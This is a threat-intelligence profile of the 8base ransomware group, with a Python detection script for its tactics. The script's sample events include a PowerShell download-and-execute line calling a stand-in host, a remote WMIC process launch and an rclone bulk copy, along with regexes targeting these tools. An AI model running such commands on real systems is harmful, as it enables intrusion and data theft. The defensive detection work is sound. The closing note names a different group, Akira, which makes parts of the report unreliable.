Overview and Recent Claimed Attacks

The 8base ransomware group has emerged as one of the most active actors in the cyber extortion landscape, targeting organizations of various sizes and across multiple sectors. The group’s organizational structure appears to consist of a core team of developers and affiliates operating under a Ransomware-as-a-Service (RaaS) model, responsible for malware distribution and ransom negotiations.

Recently, 8base has claimed attacks against companies in critical sectors — including healthcare, industrial, and public — and, in some cases, has published data fragments as proof of intrusion. Double extortion techniques (encryption + threat of data publication) remain a constant in their operations.

Group History and Interactions with Other Ransomware Groups

The first documented appearance of 8base dates back to late 2021, according to OSINT analysis and cybercrime forum activity.
Some hypotheses suggest the presence of former affiliates from groups such as Conti or REvil, though there is no definitive confirmation.

Links to Other Groups

  • Possible code or technique inheritance from groups like Trickbot, based on similarities in certain encryption modules.
  • Shared Command & Control (C2) infrastructure with smaller gangs, observed via platforms such as Shodan and Censys.

Collaborations and Conflicts

  • Potential collaborations on the dark web, identified on XSS Forum and BreachForums.
  • Reports from affiliates of delayed payments, leading to internal disputes or spin-offs.

Notable Victims

  • Hospitals and private clinics in the United States and Europe.
  • Clinical data management companies and diagnostic laboratories.
  • Mechanical and automotive companies in Germany and France.
  • Electronic component manufacturers in Asia.
  • Municipal entities in Italy and local authorities in Spain.
  • Minor government agencies in the United States.
  • Legal consulting firms and digital marketing agencies.
  • Small and medium-sized IT enterprises.

Financial Data and Ransom Demands

  • Ransom Amounts:
    • Average ransoms: USD 200,000 – 500,000 in cryptocurrency.
    • Maximum known ransom: up to USD 2 million.
  • Currencies Used:
    • Primarily Bitcoin (BTC); occasionally Monero (XMR) for enhanced anonymity.
  • Negotiation Strategies:
    • Double Extortion: data encryption + threat of publication.
    • Direct contact with victims through dedicated sites or encrypted chat channels.
  • Estimated Total Revenue:
    • Estimates range between USD 5 million and 10 million, not officially confirmed.

Techniques Used

  1. Spear Phishing
    • Sending emails with malicious attachments or links to phishing pages.
    • MITRE ATT&CK: T1566
  2. Exploitation of RDP or VPN Vulnerabilities
    • Exploiting misconfigurations or known flaws in exposed services.
    • MITRE ATT&CK: T1190

Execution and Propagation Techniques

  1. PowerShell Scripting
    • Executing scripts to download and deploy payloads across networked machines.
    • MITRE ATT&CK: T1059.001
  2. Abuse of Remote Administration Tools
    • Using PsExec or WMI for lateral movement within the network.
    • MITRE ATT&CK: T1047

Persistence Techniques

  1. Autostart Services and Registry Keys
    • Creating services or editing Windows Registry entries to ensure persistence.
    • MITRE ATT&CK: T1547
  2. Compromised Local Accounts
    • Creating or leveraging privileged accounts to maintain access.
    • MITRE ATT&CK: T1078

Data Exfiltration and Destruction Techniques

  1. Data Transfer to Third-Party Servers
    • Using SFTP or custom scripts to exfiltrate data.
    • MITRE ATT&CK: T1041
  2. Encryption and Deletion of Backups
    • Removing or disabling backup solutions prior to final encryption.
    • MITRE ATT&CK: T1486

Tools Used

  • Remcos RAT: Used for remote control of compromised machines.
  • NanoCore: Occasionally observed as a secondary payload.

Encryption Malware and Ransomware Payloads

  • 8base Payload: Custom variant, often obfuscated with proprietary packers.
  • Possible Babuk Derivative: Code similarities noted, but unconfirmed.

Lateral Movement Tools

  • PsExec: For executing commands and deploying ransomware.
  • Mimikatz: For obtaining plaintext credentials (pass-the-hash, pass-the-ticket).

Data Exfiltration Tools

  • Rclone: Used to upload data to cloud storage services.
  • Wget/PowerShell Scripts: For unauthorized file transfers.

Living-off-the-Land Binaries (LoLBins)

  • PowerShell: For in-memory execution of malicious scripts to avoid detection.
  • WMIC: For executing remote commands on Windows hosts.
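As an added illustration (not code from the report or from any vendor), the Python script below turns the execution, exfiltration and LoLBin behaviours listed in the Techniques Used and Tools Used sections into simple process-creation detection rules, tagged with the ATT&CK IDs the report assigns, and runs them over a few constructed sample events. Host names, paths and the stage.example.invalid URL are assumptions made up for the sample.

```python
import re
from collections import Counter

# Constructed sample process-creation events (not telemetry from the report).
# Format: "host|parent_image|image|command_line"; the base64 is UTF-16LE "ABC", a harmless placeholder.
SAMPLE_EVENTS = [
    "ws01|outlook.exe|powershell.exe|powershell.exe -nop -w hidden -EncodedCommand QQBCAEMA",
    "ws01|powershell.exe|powershell.exe|powershell -c IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/s.ps1')",
    "dc01|services.exe|PSEXESVC.exe|C:\\Windows\\PSEXESVC.exe",
    "ws02|cmd.exe|wmic.exe|wmic /node:srv01 process call create \"cmd /c \\\\srv01\\share\\stage.exe\"",
    "fs01|cmd.exe|rclone.exe|rclone copy D:\\Shares remote:store --transfers 16",
    "ws03|explorer.exe|notepad.exe|notepad.exe report.txt",
]

# One rule per behaviour the report attributes to 8base, tagged with the ATT&CK ID the report uses;
# rules run against "parent|image|command_line" so parent/child context can be part of the match.
RULES = [
    ("T1059.001", "PowerShell download cradle or encoded command",
     re.compile(r"powershell.*?(-enc(odedcommand)?\b|downloadstring|downloadfile|invoke-webrequest|\biex\b)", re.I)),
    ("T1047", "WMIC remote process creation",
     re.compile(r"\bwmic\b.*?(process\s+call\s+create|/node:)", re.I)),
    ("T1047", "PsExec service binary started by the service control manager",
     re.compile(r"services\.exe\|psexesvc\.exe", re.I)),
    ("T1041", "Rclone bulk copy to remote storage",
     re.compile(r"\brclone(\.exe)?\b.*?\b(copy|sync|move)\b", re.I)),
]

def parse_event(line):
    """Split one pipe-delimited event into its fields."""
    host, parent, image, cmdline = line.split("|", 3)
    return {"host": host, "parent": parent, "image": image, "cmdline": cmdline}

def detect(events):
    """Return (host, technique_id, rule_name) for every rule that fires on every event."""
    hits = []
    for line in events:
        ev = parse_event(line)
        haystack = f"{ev['parent']}|{ev['image']}|{ev['cmdline']}"
        for technique_id, name, pattern in RULES:
            if pattern.search(haystack):
                hits.append((ev["host"], technique_id, name))
    return hits

def summarize(hits):
    """Count hits per ATT&CK technique so an analyst sees which intrusion stages are visible."""
    return dict(Counter(technique_id for _, technique_id, _ in hits))

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(*hit)
```

The regexes are deliberately coarse; in a real deployment they would be tuned against the environment's baseline of legitimate PowerShell, WMI and backup-tool usage to keep false positives manageable.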

Geographic Trends

Country         Most Affected Sectors        Notes
United States   Healthcare, Public Sector    Critical infrastructure and high-value healthcare databases.
Italy           Public Sector, SMEs          Multiple municipalities targeted, lacking timely patching.

Law Enforcement Actions

  • Documented International Operations: Europol and the FBI have conducted inspections of suspect hosting providers, per official bulletins.
  • Confirmed Arrests: No direct arrests of 8base members have been reported to date.
  • Infrastructure and Wallet Seizures: No public reports of wallet or C2 server seizures directly linked to 8base.
  • Official Statements from Authorities: Some CISA and FBI IC3 reports reference ransomware threats in general, without specific mention of 8base.

Source Transparency

Source                    Reliability   Original Language   Publication Date
Shodan                    High          English             2023-06-15
AlienVault OTX            Medium        English             2023-07-01
Europol                   High          English             2023-05-20
DarkFeed.io               Medium        English             2023-07-05
VX Underground            Medium        English             2023-06-28
MITRE ATT&CK              High          English             2023-06-10
Krebs on Security         Medium        English             2023-06-25
Reddit r/cybersecurity    Low           English             2023-07-01

Note: the information in this report is sourced from materials of varying reliability and may evolve over time. We will update regularly to provide the most accurate view of the akira ransomware group’s activities.